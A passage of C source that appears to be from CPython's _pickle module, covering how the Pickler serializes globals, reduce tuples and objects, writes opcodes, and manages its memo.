/* XXX: Change to use the import C API directly with level=0 to disallow
relative imports.
XXX: PyImport_ImportModuleLevel could be used. However, this bypasses
builtins.__import__. Therefore, _pickle, unlike pickle.py, will ignore
custom import functions (IMHO, this would be a nice security
feature). The import C API would need to be extended to support the
extra parameters of __import__ to fix that. */
module = PyImport_Import(module_name);
if (module == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: import of module %R failed",
obj, module_name);
goto error;
}
lastname = PyList_GET_ITEM(dotted_path, PyList_GET_SIZE(dotted_path)-1);
Py_INCREF(lastname);
cls = get_deep_attribute(module, dotted_path, &parent);
Py_CLEAR(dotted_path);
if (cls == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: attribute lookup %S on %S failed",
obj, global_name, module_name);
goto error;
}
if (cls != obj) {
Py_DECREF(cls);
PyErr_Format(st->PicklingError,
"Can't pickle %R: it's not the same object as %S.%S",
obj, module_name, global_name);
goto error;
}
Py_DECREF(cls);
if (self->proto >= 2) {
/* See whether this is in the extension registry, and if
* so generate an EXT opcode.
*/
PyObject *extension_key;
PyObject *code_obj; /* extension code as Python object */
long code; /* extension code as C value */
char pdata[5];
Py_ssize_t n;
extension_key = PyTuple_Pack(2, module_name, global_name);
if (extension_key == NULL) {
goto error;
}
code_obj = PyDict_GetItemWithError(st->extension_registry,
extension_key);
Py_DECREF(extension_key);
/* The object is not registered in the extension registry.
This is the most likely code path. */
if (code_obj == NULL) {
if (PyErr_Occurred()) {
goto error;
}
goto gen_global;
}
/* XXX: pickle.py doesn't check neither the type, nor the range
of the value returned by the extension_registry. It should for
consistency. */
/* Verify code_obj has the right type and value. */
if (!PyLong_Check(code_obj)) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: extension code %R isn't an integer",
obj, code_obj);
goto error;
}
code = PyLong_AS_LONG(code_obj);
if (code <= 0 || code > 0x7fffffffL) {
if (!PyErr_Occurred())
PyErr_Format(st->PicklingError, "Can't pickle %R: extension "
"code %ld is out of range", obj, code);
goto error;
}
/* Generate an EXT opcode. */
if (code <= 0xff) {
pdata[0] = EXT1;
pdata[1] = (unsigned char)code;
n = 2;
}
else if (code <= 0xffff) {
pdata[0] = EXT2;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
n = 3;
}
else {
pdata[0] = EXT4;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
pdata[3] = (unsigned char)((code >> 16) & 0xff);
pdata[4] = (unsigned char)((code >> 24) & 0xff);
n = 5;
}
if (_Pickler_Write(self, pdata, n) < 0)
goto error;
}
else {
gen_global:
if (parent == module) {
Py_INCREF(lastname);
Py_DECREF(global_name);
global_name = lastname;
}
if (self->proto >= 4) {
const char stack_global_op = STACK_GLOBAL;
if (save(self, module_name, 0) < 0)
goto error;
if (save(self, global_name, 0) < 0)
goto error;
if (_Pickler_Write(self, &stack_global_op, 1) < 0)
goto error;
}
else if (parent != module) {
PickleState *st = _Pickle_GetGlobalState();
PyObject *reduce_value = Py_BuildValue("(O(OO))",
st->getattr, parent, lastname);
if (reduce_value == NULL)
goto error;
status = save_reduce(self, reduce_value, NULL);
Py_DECREF(reduce_value);
if (status < 0)
goto error;
}
else {
/* Generate a normal global opcode if we are using a pickle
protocol < 4, or if the object is not registered in the
extension registry. */
PyObject *encoded;
PyObject *(*unicode_encoder)(PyObject *);
if (_Pickler_Write(self, &global_op, 1) < 0)
goto error;
/* For protocol < 3 and if the user didn't request against doing
so, we convert module names to the old 2.x module names. */
if (self->proto < 3 && self->fix_imports) {
if (fix_imports(&module_name, &global_name) < 0) {
goto error;
}
}
/* Since Python 3.0 now supports non-ASCII identifiers, we encode
both the module name and the global name using UTF-8. We do so
only when we are using the pickle protocol newer than version
3. This is to ensure compatibility with older Unpickler running
on Python 2.x. */
if (self->proto == 3) {
unicode_encoder = PyUnicode_AsUTF8String;
}
else {
unicode_encoder = PyUnicode_AsASCIIString;
}
encoded = unicode_encoder(module_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle module identifier '%S' using "
"pickle protocol %i",
module_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if(_Pickler_Write(self, "\n", 1) < 0)
goto error;
/* Save the name of the module. */
encoded = unicode_encoder(global_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle global identifier '%S' using "
"pickle protocol %i",
global_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
goto error;
}
/* Memoize the object. */
if (memo_put(self, obj) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(module_name);
Py_XDECREF(global_name);
Py_XDECREF(module);
Py_XDECREF(parent);
Py_XDECREF(dotted_path);
Py_XDECREF(lastname);
return status;
}
static int
save_singleton_type(PicklerObject *self, PyObject *obj, PyObject *singleton)
{
PyObject *reduce_value;
int status;
reduce_value = Py_BuildValue("O(O)", &PyType_Type, singleton);
if (reduce_value == NULL) {
return -1;
}
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
static int
save_type(PicklerObject *self, PyObject *obj)
{
if (obj == (PyObject *)&_PyNone_Type) {
return save_singleton_type(self, obj, Py_None);
}
else if (obj == (PyObject *)&PyEllipsis_Type) {
return save_singleton_type(self, obj, Py_Ellipsis);
}
else if (obj == (PyObject *)&_PyNotImplemented_Type) {
return save_singleton_type(self, obj, Py_NotImplemented);
}
return save_global(self, obj, NULL);
}
static int
save_pers(PicklerObject *self, PyObject *obj)
{
PyObject *pid = NULL;
int status = 0;
const char persid_op = PERSID;
const char binpersid_op = BINPERSID;
pid = call_method(self->pers_func, self->pers_func_self, obj);
if (pid == NULL)
return -1;
if (pid != Py_None) {
if (self->bin) {
if (save(self, pid, 1) < 0 ||
_Pickler_Write(self, &binpersid_op, 1) < 0)
goto error;
}
else {
PyObject *pid_str;
pid_str = PyObject_Str(pid);
if (pid_str == NULL)
goto error;
/* XXX: Should it check whether the pid contains embedded
newlines? */
if (!PyUnicode_IS_ASCII(pid_str)) {
PyErr_SetString(_Pickle_GetGlobalState()->PicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
Py_DECREF(pid_str);
goto error;
}
if (_Pickler_Write(self, &persid_op, 1) < 0 ||
_Pickler_Write(self, PyUnicode_DATA(pid_str),
PyUnicode_GET_LENGTH(pid_str)) < 0 ||
_Pickler_Write(self, "\n", 1) < 0) {
Py_DECREF(pid_str);
goto error;
}
Py_DECREF(pid_str);
}
status = 1;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(pid);
return status;
}
static PyObject *
get_class(PyObject *obj)
{
PyObject *cls;
_Py_IDENTIFIER(__class__);
if (_PyObject_LookupAttrId(obj, &PyId___class__, &cls) == 0) {
cls = (PyObject *) Py_TYPE(obj);
Py_INCREF(cls);
}
return cls;
}
/* We're saving obj, and args is the 2-thru-5 tuple returned by the
* appropriate __reduce__ method for obj.
*/
static int
save_reduce(PicklerObject *self, PyObject *args, PyObject *obj)
{
PyObject *callable;
PyObject *argtup;
PyObject *state = NULL;
PyObject *listitems = Py_None;
PyObject *dictitems = Py_None;
PickleState *st = _Pickle_GetGlobalState();
Py_ssize_t size;
int use_newobj = 0, use_newobj_ex = 0;
const char reduce_op = REDUCE;
const char build_op = BUILD;
const char newobj_op = NEWOBJ;
const char newobj_ex_op = NEWOBJ_EX;
size = PyTuple_Size(args);
if (size < 2 || size > 5) {
PyErr_SetString(st->PicklingError, "tuple returned by "
"__reduce__ must contain 2 through 5 elements");
return -1;
}
if (!PyArg_UnpackTuple(args, "save_reduce", 2, 5,
&callable, &argtup, &state, &listitems, &dictitems))
return -1;
if (!PyCallable_Check(callable)) {
PyErr_SetString(st->PicklingError, "first item of the tuple "
"returned by __reduce__ must be callable");
return -1;
}
if (!PyTuple_Check(argtup)) {
PyErr_SetString(st->PicklingError, "second item of the tuple "
"returned by __reduce__ must be a tuple");
return -1;
}
if (state == Py_None)
state = NULL;
if (listitems == Py_None)
listitems = NULL;
else if (!PyIter_Check(listitems)) {
PyErr_Format(st->PicklingError, "fourth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(listitems)->tp_name);
return -1;
}
if (dictitems == Py_None)
dictitems = NULL;
else if (!PyIter_Check(dictitems)) {
PyErr_Format(st->PicklingError, "fifth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(dictitems)->tp_name);
return -1;
}
if (self->proto >= 2) {
PyObject *name;
_Py_IDENTIFIER(__name__);
if (_PyObject_LookupAttrId(callable, &PyId___name__, &name) < 0) {
return -1;
}
if (name != NULL && PyUnicode_Check(name)) {
_Py_IDENTIFIER(__newobj_ex__);
use_newobj_ex = _PyUnicode_EqualToASCIIId(
name, &PyId___newobj_ex__);
if (!use_newobj_ex) {
_Py_IDENTIFIER(__newobj__);
use_newobj = _PyUnicode_EqualToASCIIId(name, &PyId___newobj__);
}
}
Py_XDECREF(name);
}
if (use_newobj_ex) {
PyObject *cls;
PyObject *args;
PyObject *kwargs;
if (PyTuple_GET_SIZE(argtup) != 3) {
PyErr_Format(st->PicklingError,
"length of the NEWOBJ_EX argument tuple must be "
"exactly 3, not %zd", PyTuple_GET_SIZE(argtup));
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_Format(st->PicklingError,
"first item from NEWOBJ_EX argument tuple must "
"be a class, not %.200s", Py_TYPE(cls)->tp_name);
return -1;
}
args = PyTuple_GET_ITEM(argtup, 1);
if (!PyTuple_Check(args)) {
PyErr_Format(st->PicklingError,
"second item from NEWOBJ_EX argument tuple must "
"be a tuple, not %.200s", Py_TYPE(args)->tp_name);
return -1;
}
kwargs = PyTuple_GET_ITEM(argtup, 2);
if (!PyDict_Check(kwargs)) {
PyErr_Format(st->PicklingError,
"third item from NEWOBJ_EX argument tuple must "
"be a dict, not %.200s", Py_TYPE(kwargs)->tp_name);
return -1;
}
if (self->proto >= 4) {
if (save(self, cls, 0) < 0 ||
save(self, args, 0) < 0 ||
save(self, kwargs, 0) < 0 ||
_Pickler_Write(self, &newobj_ex_op, 1) < 0) {
return -1;
}
}
else {
PyObject *newargs;
PyObject *cls_new;
Py_ssize_t i;
_Py_IDENTIFIER(__new__);
newargs = PyTuple_New(PyTuple_GET_SIZE(args) + 2);
if (newargs == NULL)
return -1;
cls_new = _PyObject_GetAttrId(cls, &PyId___new__);
if (cls_new == NULL) {
Py_DECREF(newargs);
return -1;
}
PyTuple_SET_ITEM(newargs, 0, cls_new);
Py_INCREF(cls);
PyTuple_SET_ITEM(newargs, 1, cls);
for (i = 0; i < PyTuple_GET_SIZE(args); i++) {
PyObject *item = PyTuple_GET_ITEM(args, i);
Py_INCREF(item);
PyTuple_SET_ITEM(newargs, i + 2, item);
}
callable = PyObject_Call(st->partial, newargs, kwargs);
Py_DECREF(newargs);
if (callable == NULL)
return -1;
newargs = PyTuple_New(0);
if (newargs == NULL) {
Py_DECREF(callable);
return -1;
}
if (save(self, callable, 0) < 0 ||
save(self, newargs, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0) {
Py_DECREF(newargs);
Py_DECREF(callable);
return -1;
}
Py_DECREF(newargs);
Py_DECREF(callable);
}
}
else if (use_newobj) {
PyObject *cls;
PyObject *newargtup;
PyObject *obj_class;
int p;
/* Sanity checks. */
if (PyTuple_GET_SIZE(argtup) < 1) {
PyErr_SetString(st->PicklingError, "__newobj__ arglist is empty");
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args is not a type");
return -1;
}
if (obj != NULL) {
obj_class = get_class(obj);
p = obj_class != cls; /* true iff a problem */
Py_DECREF(obj_class);
if (p) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args has the wrong class");
return -1;
}
}
/* XXX: These calls save() are prone to infinite recursion. Imagine
what happen if the value returned by the __reduce__() method of
some extension type contains another object of the same type. Ouch!
Here is a quick example, that I ran into, to illustrate what I
mean:
>>> import pickle, copyreg
>>> copyreg.dispatch_table.pop(complex)
>>> pickle.dumps(1+2j)
Traceback (most recent call last):
...
RecursionError: maximum recursion depth exceeded
Removing the complex class from copyreg.dispatch_table made the
__reduce_ex__() method emit another complex object:
>>> (1+1j).__reduce_ex__(2)
(<function __newobj__ at 0xb7b71c3c>,
(<class 'complex'>, (1+1j)), None, None, None)
Thus when save() was called on newargstup (the 2nd item) recursion
ensued. Of course, the bug was in the complex class which had a
broken __getnewargs__() that emitted another complex object. But,
the point, here, is it is quite easy to end up with a broken reduce
function. */
/* Save the class and its __new__ arguments. */
if (save(self, cls, 0) < 0)
return -1;
newargtup = PyTuple_GetSlice(argtup, 1, PyTuple_GET_SIZE(argtup));
if (newargtup == NULL)
return -1;
p = save(self, newargtup, 0);
Py_DECREF(newargtup);
if (p < 0)
return -1;
/* Add NEWOBJ opcode. */
if (_Pickler_Write(self, &newobj_op, 1) < 0)
return -1;
}
else { /* Not using NEWOBJ. */
if (save(self, callable, 0) < 0 ||
save(self, argtup, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0)
return -1;
}
/* obj can be NULL when save_reduce() is used directly. A NULL obj means
the caller do not want to memoize the object. Not particularly useful,
but that is to mimic the behavior save_reduce() in pickle.py when
obj is None. */
if (obj != NULL) {
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_op = POP;
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else if (memo_put(self, obj) < 0)
return -1;
}
if (listitems && batch_list(self, listitems) < 0)
return -1;
if (dictitems && batch_dict(self, dictitems) < 0)
return -1;
if (state) {
if (save(self, state, 0) < 0 ||
_Pickler_Write(self, &build_op, 1) < 0)
return -1;
}
return 0;
}
static int
save(PicklerObject *self, PyObject *obj, int pers_save)
{
PyTypeObject *type;
PyObject *reduce_func = NULL;
PyObject *reduce_value = NULL;
int status = 0;
if (_Pickler_OpcodeBoundary(self) < 0)
return -1;
/* The extra pers_save argument is necessary to avoid calling save_pers()
on its returned object. */
if (!pers_save && self->pers_func) {
/* save_pers() returns:
-1 to signal an error;
0 if it did nothing successfully;
1 if a persistent id was saved.
*/
if ((status = save_pers(self, obj)) != 0)
return status;
}
type = Py_TYPE(obj);
/* The old cPickle had an optimization that used switch-case statement
dispatching on the first letter of the type name. This has was removed
since benchmarks shown that this optimization was actually slowing
things down. */
/* Atom types; these aren't memoized, so don't check the memo. */
if (obj == Py_None) {
return save_none(self, obj);
}
else if (obj == Py_False || obj == Py_True) {
return save_bool(self, obj);
}
else if (type == &PyLong_Type) {
return save_long(self, obj);
}
else if (type == &PyFloat_Type) {
return save_float(self, obj);
}
/* Check the memo to see if it has the object. If so, generate
a GET (or BINGET) opcode, instead of pickling the object
once again. */
if (PyMemoTable_Get(self->memo, obj)) {
return memo_get(self, obj);
}
if (type == &PyBytes_Type) {
return save_bytes(self, obj);
}
else if (type == &PyUnicode_Type) {
return save_unicode(self, obj);
}
/* We're only calling Py_EnterRecursiveCall here so that atomic
types above are pickled faster. */
if (Py_EnterRecursiveCall(" while pickling an object")) {
return -1;
}
if (type == &PyDict_Type) {
status = save_dict(self, obj);
goto done;
}
else if (type == &PySet_Type) {
status = save_set(self, obj);
goto done;
}
else if (type == &PyFrozenSet_Type) {
status = save_frozenset(self, obj);
goto done;
}
else if (type == &PyList_Type) {
status = save_list(self, obj);
goto done;
}
else if (type == &PyTuple_Type) {
status = save_tuple(self, obj);
goto done;
}
else if (type == &PyType_Type) {
status = save_type(self, obj);
goto done;
}
else if (type == &PyFunction_Type) {
status = save_global(self, obj, NULL);
goto done;
}
/* XXX: This part needs some unit tests. */
/* Get a reduction callable, and call it. This may come from
* self.dispatch_table, copyreg.dispatch_table, the object's
* __reduce_ex__ method, or the object's __reduce__ method.
*/
if (self->dispatch_table == NULL) {
PickleState *st = _Pickle_GetGlobalState();
reduce_func = PyDict_GetItemWithError(st->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_Occurred()) {
goto error;
}
} else {
/* PyDict_GetItemWithError() returns a borrowed reference.
Increase the reference count to be consistent with
PyObject_GetItem and _PyObject_GetAttrId used below. */
Py_INCREF(reduce_func);
}
} else {
reduce_func = PyObject_GetItem(self->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_ExceptionMatches(PyExc_KeyError))
PyErr_Clear();
else
goto error;
}
}
if (reduce_func != NULL) {
Py_INCREF(obj);
reduce_value = _Pickle_FastCall(reduce_func, obj);
}
else if (PyType_IsSubtype(type, &PyType_Type)) {
status = save_global(self, obj, NULL);
goto done;
}
else {
_Py_IDENTIFIER(__reduce__);
_Py_IDENTIFIER(__reduce_ex__);
/* XXX: If the __reduce__ method is defined, __reduce_ex__ is
automatically defined as __reduce__. While this is convenient, this
make it impossible to know which method was actually called. Of
course, this is not a big deal. But still, it would be nice to let
the user know which method was called when something go
wrong. Incidentally, this means if __reduce_ex__ is not defined, we
don't actually have to check for a __reduce__ method. */
/* Check for a __reduce_ex__ method. */
if (_PyObject_LookupAttrId(obj, &PyId___reduce_ex__, &reduce_func) < 0) {
goto error;
}
if (reduce_func != NULL) {
PyObject *proto;
proto = PyLong_FromLong(self->proto);
if (proto != NULL) {
reduce_value = _Pickle_FastCall(reduce_func, proto);
}
}
else {
PickleState *st = _Pickle_GetGlobalState();
/* Check for a __reduce__ method. */
reduce_func = _PyObject_GetAttrId(obj, &PyId___reduce__);
if (reduce_func != NULL) {
reduce_value = _PyObject_CallNoArg(reduce_func);
}
else {
PyErr_Format(st->PicklingError,
"can't pickle '%.200s' object: %R",
type->tp_name, obj);
goto error;
}
}
}
if (reduce_value == NULL)
goto error;
if (PyUnicode_Check(reduce_value)) {
status = save_global(self, obj, reduce_value);
goto done;
}
if (!PyTuple_Check(reduce_value)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"__reduce__ must return a string or tuple");
goto error;
}
status = save_reduce(self, reduce_value, obj);
if (0) {
error:
status = -1;
}
done:
Py_LeaveRecursiveCall();
Py_XDECREF(reduce_func);
Py_XDECREF(reduce_value);
return status;
}
static int
dump(PicklerObject *self, PyObject *obj)
{
const char stop_op = STOP;
if (self->proto >= 2) {
char header[2];
header[0] = PROTO;
assert(self->proto >= 0 && self->proto < 256);
header[1] = (unsigned char)self->proto;
if (_Pickler_Write(self, header, 2) < 0)
return -1;
if (self->proto >= 4)
self->framing = 1;
}
if (save(self, obj, 0) < 0 ||
_Pickler_Write(self, &stop_op, 1) < 0 ||
_Pickler_CommitFrame(self) < 0)
return -1;
self->framing = 0;
return 0;
}
/*[clinic input]
_pickle.Pickler.clear_memo
Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects are
pickled by reference and not by value. This method is useful when
re-using picklers.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_clear_memo_impl(PicklerObject *self)
/*[clinic end generated code: output=8665c8658aaa094b input=01bdad52f3d93e56]*/
{
if (self->memo)
PyMemoTable_Clear(self->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.dump
obj: object
/
Write a pickled representation of the given object to the open file.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_dump(PicklerObject *self, PyObject *obj)
/*[clinic end generated code: output=87ecad1261e02ac7 input=552eb1c0f52260d9]*/
{
/* Check whether the Pickler was initialized correctly (issue3664).
Developers often forget to call __init__() in their subclasses, which
would trigger a segfault without this check. */
if (self->write == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->PicklingError,
"Pickler.__init__() was not called by %s.__init__()",
Py_TYPE(self)->tp_name);
return NULL;
}
if (_Pickler_ClearBuffer(self) < 0)
return NULL;
if (dump(self, obj) < 0)
return NULL;
if (_Pickler_FlushToFile(self) < 0)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Pickler___sizeof___impl(PicklerObject *self)
/*[clinic end generated code: output=106edb3123f332e1 input=8cbbec9bd5540d42]*/
{
Py_ssize_t res, s;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL) {
res += sizeof(PyMemoTable);
res += self->memo->mt_allocated * sizeof(PyMemoEntry);
}
if (self->output_buffer != NULL) {
s = _PySys_GetSizeOf(self->output_buffer);
if (s == -1)
return -1;
res += s;
}
return res;
}
static struct PyMethodDef Pickler_methods[] = {
_PICKLE_PICKLER_DUMP_METHODDEF
_PICKLE_PICKLER_CLEAR_MEMO_METHODDEF
_PICKLE_PICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Pickler_dealloc(PicklerObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->output_buffer);
Py_XDECREF(self->write);
Py_XDECREF(self->pers_func);
Py_XDECREF(self->dispatch_table);
Py_XDECREF(self->fast_memo);
PyMemoTable_Del(self->memo);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Pickler_traverse(PicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->write);
Py_VISIT(self->pers_func);
Py_VISIT(self->dispatch_table);
Py_VISIT(self->fast_memo);
return 0;
}
static int
Pickler_clear(PicklerObject *self)
{
Py_CLEAR(self->output_buffer);
Py_CLEAR(self->write);
Py_CLEAR(self->pers_func);
Py_CLEAR(self->dispatch_table);
Py_CLEAR(self->fast_memo);
if (self->memo != NULL) {
PyMemoTable *memo = self->memo;
self->memo = NULL;
PyMemoTable_Del(memo);
}
return 0;
}
/*[clinic input]
_pickle.Pickler.__init__
file: object
protocol: object = NULL
fix_imports: bool = True
This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 3; a backward-incompatible protocol designed for Python 3.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static int
_pickle_Pickler___init___impl(PicklerObject *self, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=b5f31078dab17fb0 input=4faabdbc763c2389]*/
{
_Py_IDENTIFIER(persistent_id);
_Py_IDENTIFIER(dispatch_table);
/* In case of multiple __init__() calls, clear previous content. */
if (self->write != NULL)
(void)Pickler_clear(self);
if (_Pickler_SetProtocol(self, protocol, fix_imports) < 0)
return -1;
if (_Pickler_SetOutputStream(self, file) < 0)
return -1;
/* memo and output_buffer may have already been created in _Pickler_New */
if (self->memo == NULL) {
self->memo = PyMemoTable_New();
if (self->memo == NULL)
return -1;
}
self->output_len = 0;
if (self->output_buffer == NULL) {
self->max_output_len = WRITE_BUF_SIZE;
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->output_buffer == NULL)
return -1;
}
self->fast = 0;
self->fast_nesting = 0;
self->fast_memo = NULL;
if (init_method_ref((PyObject *)self, &PyId_persistent_id,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
if (_PyObject_LookupAttrId((PyObject *)self,
&PyId_dispatch_table, &self->dispatch_table) < 0) {
return -1;
}
return 0;
}
/* Define a proxy object for the Pickler's internal memo object. This is to
* avoid breaking code like:
* pickler.memo.clear()
* and
* pickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*/
/*[clinic input]
_pickle.PicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_clear_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=5fb9370d48ae8b05 input=ccc186dacd0f1405]*/
{
if (self->pickler->memo)
PyMemoTable_Clear(self->pickler->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.PicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_copy_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bb83a919d29225ef input=b73043485ac30b36]*/
{
Py_ssize_t i;
PyMemoTable *memo;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
memo = self->pickler->memo;
for (i = 0; i < memo->mt_allocated; ++i) {
PyMemoEntry entry = memo->mt_table[i];
if (entry.me_key != NULL) {
int status;
PyObject *key, *value;
key = PyLong_FromVoidPtr(entry.me_key);
value = Py_BuildValue("nO", entry.me_value, entry.me_key);
if (key == NULL || value == NULL) {
Py_XDECREF(key);
Py_XDECREF(value);
goto error;
}
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
Py_DECREF(value);
if (status < 0)
goto error;
}
}
return new_memo;
error:
Py_XDECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.PicklerMemoProxy.__reduce__
Implement pickle support.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy___reduce___impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bebba1168863ab1d input=2f7c540e24b7aae4]*/
{
PyObject *reduce_value, *dict_args;
PyObject *contents = _pickle_PicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
dict_args = PyTuple_New(1);
if (dict_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(dict_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, dict_args);
return reduce_value;
}
static PyMethodDef picklerproxy_methods[] = {
_PICKLE_PICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_PICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_PICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
PicklerMemoProxy_dealloc(PicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->pickler);
PyObject_GC_Del((PyObject *)self);
}
static int
PicklerMemoProxy_traverse(PicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->pickler);
return 0;
}
static int
PicklerMemoProxy_clear(PicklerMemoProxyObject *self)
{
Py_CLEAR(self->pickler);
return 0;
}
static PyTypeObject PicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.PicklerMemoProxy", /*tp_name*/
sizeof(PicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)PicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)PicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)PicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
picklerproxy_methods, /* tp_methods */
};
static PyObject *
PicklerMemoProxy_New(PicklerObject *pickler)
{
PicklerMemoProxyObject *self;
self = PyObject_GC_New(PicklerMemoProxyObject, &PicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(pickler);
self->pickler = pickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Pickler_get_memo(PicklerObject *self)
{
return PicklerMemoProxy_New(self);
}
static int
Pickler_set_memo(PicklerObject *self, PyObject *obj)
{
PyMemoTable *new_memo = NULL;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &PicklerMemoProxyType) {
PicklerObject *pickler =
((PicklerMemoProxyObject *)obj)->pickler;
new_memo = PyMemoTable_Copy(pickler->memo);
if (new_memo == NULL)
return -1;
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo = PyMemoTable_New();
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t memo_id;
PyObject *memo_obj;
if (!PyTuple_Check(value) || PyTuple_GET_SIZE(value) != 2) {
PyErr_SetString(PyExc_TypeError,
"'memo' values must be 2-item tuples");
goto error;
}
